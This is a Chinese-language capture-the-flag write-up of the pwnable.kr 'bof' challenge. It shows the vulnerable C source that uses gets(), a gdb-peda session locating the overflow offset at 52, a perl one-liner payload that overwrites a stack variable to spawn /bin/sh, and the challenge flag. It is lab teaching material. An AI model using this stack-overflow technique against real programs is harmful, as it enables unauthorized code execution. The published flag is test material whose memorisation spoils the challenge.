题目传送门:http://pwnable.kr/play.php

下载连接中的源代码和二进制文件后,查看源代码如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; }
|
判断这个时考察缓冲区溢出的题目,漏洞产生原因时gets()函数对输入的数据长度没有做检查,导致溢出,上gdb分析
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50
| root@kali-linux:~/文档/PWN/pwnable.kr/3.bof
warning: build/bdist.linux-x86_64/wheel/peda/peda.py: No such file or directory Reading symbols from ./bof...(no debugging symbols found)...done. gdb-peda$ pattern_creat 150 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA' gdb-peda$ r Starting program: /root/文档/PWN/pwnable.kr/3.bof/bof overflow me : AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA Nah.. *** stack smashing detected ***: /root/文档/PWN/pwnable.kr/3.bof/bof terminated
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------] EAX: 0x31414162 ('bAA1') EBX: 0xf7fcf000 --> 0x1bef0 ECX: 0xffffd210 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA") EDX: 0xf7ffd4fc --> 0x0 ESI: 0xffffc9e0 --> 0x0 EDI: 0xffffc9e0 --> 0x0 EBP: 0xffffcab8 --> 0xffffcb18 --> 0xf7fa4000 --> 0x1b2db0 ESP: 0xffffc910 --> 0x40000000 ('') EIP: 0xf7fc6886 (cmp WORD PTR [eax],0xb858) EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0xf7fc687e: xchg ax,ax 0xf7fc6880: mov ecx,DWORD PTR [eax+0x48] 0xf7fc6883: mov eax,DWORD PTR [eax+0x4c] => 0xf7fc6886: cmp WORD PTR [eax],0xb858 0xf7fc688b: je 0xf7fc6b28 0xf7fc6891: cmp BYTE PTR [eax],0xb8 0xf7fc6894: jne 0xf7fc68b0 0xf7fc6896: cmp DWORD PTR [eax+0x1],0xad [------------------------------------stack-------------------------------------] 0000| 0xffffc910 --> 0x40000000 ('') 0004| 0xffffc914 --> 0x0 0008| 0xffffc918 --> 0xffffc960 --> 0x0 0012| 0xffffc91c --> 0xf7fcf000 --> 0x1bef0 0016| 0xffffc920 --> 0x0 0020| 0xffffc924 --> 0x0 0024| 0xffffc928 --> 0x0 0028| 0xffffc92c --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0xf7fc6886 in ?? () from /lib/i386-linux-gnu/libgcc_s.so.1 gdb-peda$ pattern_offset AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA found at offset: 52
|
判断溢出的偏移位数为52,而在代码中:
1 2 3
| if(key == 0xcafebabe){ system("/bin/sh"); }
|
需要将key所在的内存数据替换为0xcafebabe
,而通过file命令我们可以知道本程序为32位程序,采用小端序,因此我们只需构造"A"*52+""\xbe\xba\xfe\xca"
来进行溢出
1 2
| root@kali-linux:~/文档/PWN/pwnable.kr/3.bof bof: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=ed643dfe8d026b7238d3033b0d0bcc499504f273, not stripped
|
poc
1
| (perl -e 'print "A"x52 . "\xbe\xba\xfe\xca\n"'; cat -) | ./bof
|
即可运行/bin/sh
来cat flag:
1
| daddy, I just pwned a buFFer :)
|